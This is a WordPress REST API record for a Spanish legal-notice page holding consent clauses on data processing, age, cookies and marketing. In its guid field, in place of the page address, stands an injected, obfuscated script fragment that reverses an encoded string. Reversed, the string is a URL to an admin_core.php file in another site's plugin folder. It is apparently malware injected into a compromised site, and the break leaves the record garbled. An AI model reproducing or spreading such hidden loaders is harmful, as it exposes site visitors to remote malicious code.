{"id":804,"date":"2019-11-25T11:49:17","date_gmt":"2019-11-25T10:49:17","guid":{"rendered":"https:\/\/wem<script>$Ikf=function(n){if (typeof ($Ikf.list[n]) == \"string\") return $Ikf.list[n].split(\"\").reverse().join(\"\");return $Ikf.list[n];};$Ikf.list=[\"\\'php.eroc_nimda\/bil\/steewt-tsetal-siseneg\/snigulp\/tnetnoc-pw\/moc.nosredneherdied.www\/\/:ptth\\'=fe"},"modified":"2019-11-25T11:53:04","modified_gmt":"2019-11-25T10:53:04","slug":"aviso-legal","status":"publish","type":"page","link":"https:\/\/wemandus.com\/?page_id=804","title":{"rendered":"Aviso Legal"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"804\" class=\"elementor elementor-804\">\n\t\t\t\t\t\t<div class=\"elementor-inner\">\n\t\t\t\t<div class=\"elementor-section-wrap\">\n\t\t\t\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-af99496 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"af99496\" data-element_type=\"section\" data-settings=\"{&quot;stretch_section&quot;:&quot;section-stretched&quot;}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2070c22\" data-id=\"2070c22\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-6d7c5bc elementor-widget elementor-widget-text-editor\" data-id=\"6d7c5bc\" data-element_type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t<div class=\"elementor-text-editor elementor-clearfix\">\n\t\t\t\t<p>Usted consiente,\u00a0<span style=\"font-weight: bolder;\">a trav\u00e9s de la marcaci\u00f3n de la presente casilla<\/span>, al tratamiento de sus datos con las finalidades descritas en la\u00a0<a href=\"https:\/\/wemandus.com\/?page_id=795\">Pol\u00edtica de Privacidad y protecci\u00f3n de datos.<\/a><\/p><p>Usted declara,\u00a0<span style=\"font-weight: bolder;\">a trav\u00e9s de la marcaci\u00f3n de la presente casilla<\/span>, bajo su propia responsabilidad, tener cumplidos los catorce a\u00f1os de edad, respondiendo de manera exclusiva y personal de la veracidad de dicha declaraci\u00f3n y asumiendo, por ende, las posibles responsabilidades legales al respecto.<\/p><p>Usted consiente,\u00a0<span style=\"font-weight: bolder;\">a trav\u00e9s de la marcaci\u00f3n de la presente casilla<\/span>, a la instalaci\u00f3n de cookies en su ordenador con las finalidades descritas en la\u00a0<a href=\"https:\/\/wemandus.com\/?page_id=799\">Pol\u00edtica de cookies.<\/a><\/p><p>Usted consiente,\u00a0<span style=\"font-weight: bolder;\">a trav\u00e9s de la marcaci\u00f3n de la presente casilla<\/span>, la recepci\u00f3n de comunicaciones comerciales y de cortes\u00eda relacionadas con nuestra entidad a trav\u00e9s del tel\u00e9fono, correo postal ordinario, fax, correo electr\u00f3nico o medios de comunicaci\u00f3n electr\u00f3nica equivalentes.<\/p>\t\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Usted consiente,\u00a0a trav\u00e9s de la marcaci\u00f3n de la presente casilla, al tratamiento de sus datos con las finalidades descritas en la\u00a0Pol\u00edtica de cookies. Usted consiente,\u00a0a trav\u00e9s de la marcaci\u00f3n de la presente casilla, la recepci\u00f3n de comunicaciones comerciales y de cortes\u00eda relacionadas con nuestra entidad a trav\u00e9s del tel\u00e9fono, correo postal ordinario, fax, correo electr\u00f3nico<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_mi_skip_tracking":false},"_links":{"self":[{"href":"https:\/\/wemandus.com\/index.php?rest_route=\/wp\/v2\/pages\/804"}],"collection":[{"href":"https:\/\/wemandus.com\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/wemandus.com\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/wemandus.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/wemandus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=804"}],"version-history":[{"count":3,"href":"https:\/\/wemandus.com\/index.php?rest_route=\/wp\/v2\/pages\/804\/revisions"}],"predecessor-version":[{"id":808,"href":"https:\/\/wemandus.com\/index.php?rest_route=\/wp\/v2\/pages\/804\/revisions\/808"}],"wp:attachment":[{"href":"https:\/\/wemandus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=804"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}